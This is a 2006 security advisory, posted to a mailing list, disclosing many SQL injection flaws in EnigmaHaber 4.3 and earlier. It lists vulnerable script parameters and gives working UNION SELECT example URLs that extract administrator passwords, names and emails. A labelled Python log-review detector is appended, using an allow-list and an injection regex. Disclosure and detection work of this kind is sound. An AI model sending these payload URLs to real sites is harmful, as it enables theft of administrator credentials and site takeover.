

Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection


Date: Sun, 28 May 2006 16:58:56 +0300
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com.>
To: [email protected], [email protected],
Subject: Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection
        Vulnerabilities
MIME-Version: 1.0
Content-Type: text/plain;
        charset=ISO-8859-9;
        DelSp="Yes";
        format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1)
X-Virus-Scanned: antivirus-gw at tyumen.ru


--Security Report--
Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:16 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: EnigmaASP (http://www.enigmaasp.net/)
Version: 4.3 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries to EnigmaHaber. See the examples.
Level: Critical
---
How&Example:
GET -> http://[site]/enigmadir/e_mesaj_yaz.asp?id=SQL
EXAMPLE -> http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
GET -> http://[site]/enigmadir/yazdir.asp?hid=SQL
GET -> http://[site]/enigmadir/yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
GET -> http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
GET -> http://[site]/enigmadir/arsiv.asp?d=hid&e=desc[SQL]&ay=00&yil=00&e_kad=00
EXAMPLE -> http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
GET -> http://[site]/enigmadir/haber_devam.asp?id=SQL
The examples below need admin rights.
GET -> http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
EXAMPLE -> http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
GET -> http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
GET -> http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
GET -> http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
GET -> http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
GET -> http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted the vendor, waiting for a reply.
---
Exploit: http://www.nukedx.com/?getxpl=34
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
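
Added example, not part of the original advisory or the vendor's code: a log-review check that flags requests to the scripts listed above when the named parameter carries anything other than the expected value. It takes the URI stem and query string as separate fields (as IIS W3C logs record them); treating the id-style parameters as integers and `e` as a sort direction are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl

# Script -> (parameter, kind), one entry per URL listed in the advisory.
# Assumption: id-style parameters are integers, "e" is asc/desc, "ara" is text.
WATCHED = {
    "e_mesaj_yaz.asp": ("id", "int"), "yazdir.asp": ("hid", "int"),
    "yorum.asp": ("hid", "int"), "edi_haber.asp": ("id", "int"),
    "haber_devam.asp": ("id", "int"), "ara.asp": ("ara", "text"),
    "arsiv.asp": ("e", "sort"), "admin/y_admin.asp": ("yid", "int"),
    "admin/reklam_detay.asp": ("bid", "int"),
    "admin/detay_yorum.asp": ("hid", "int"),
    "admin/haber_sil.asp": ("hid", "int"),
    "admin/kategori_d.asp": ("kid", "int"),
    "admin/haber_ekle.asp": ("tur", "int"),
    "admin/e_mesaj_yaz.asp": ("s", "int"),
    "admin/admin_sil.asp": ("id", "int"),
}
# Heuristic for free-text search input; it can flag legitimate apostrophes.
SQL_HINT = re.compile(r"\bunion\b.+\bselect\b|'|--", re.I)

def is_valid(kind, value):
    if kind == "int":
        return re.fullmatch(r"[0-9]+", value) is not None
    if kind == "sort":
        return value.lower() in ("asc", "desc")
    return SQL_HINT.search(value) is None

def suspicious(uri_stem, uri_query):
    """Return (script, parameter, decoded value) for a failing request, else None."""
    parts = uri_stem.lower().split("/")
    key = ("admin/" if parts[-2:-1] == ["admin"] else "") + parts[-1]
    if key not in WATCHED:
        return None
    param, kind = WATCHED[key]
    # Classic ASP reads query-string names case-insensitively, so compare lowered.
    for name, value in parse_qsl(uri_query, keep_blank_values=True):
        if name.lower() == param and not is_valid(kind, value):
            return (key, param, value)
    return None

# Constructed sample requests: (cs-uri-stem, cs-uri-query).
SAMPLE = [
    ("/enigmadir/haber_devam.asp", "id=42"),
    ("/enigmadir/e_mesaj_yaz.asp", "id=1+UNION+SELECT+0,1"),
    ("/enigmadir/arsiv.asp", "d=hid&e=desc+UNION+SELECT+0&ay=00&yil=00"),
    ("/enigmadir/ara.asp", "yo=1&ara=deprem&ko=0"),
]

def scan(requests):
    return [hit for hit in (suspicious(s, q) for s, q in requests) if hit]
```

The same allow-list (digits only for ids, `asc`/`desc` for the sort field) is what the scripts themselves would need to enforce before building their queries.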


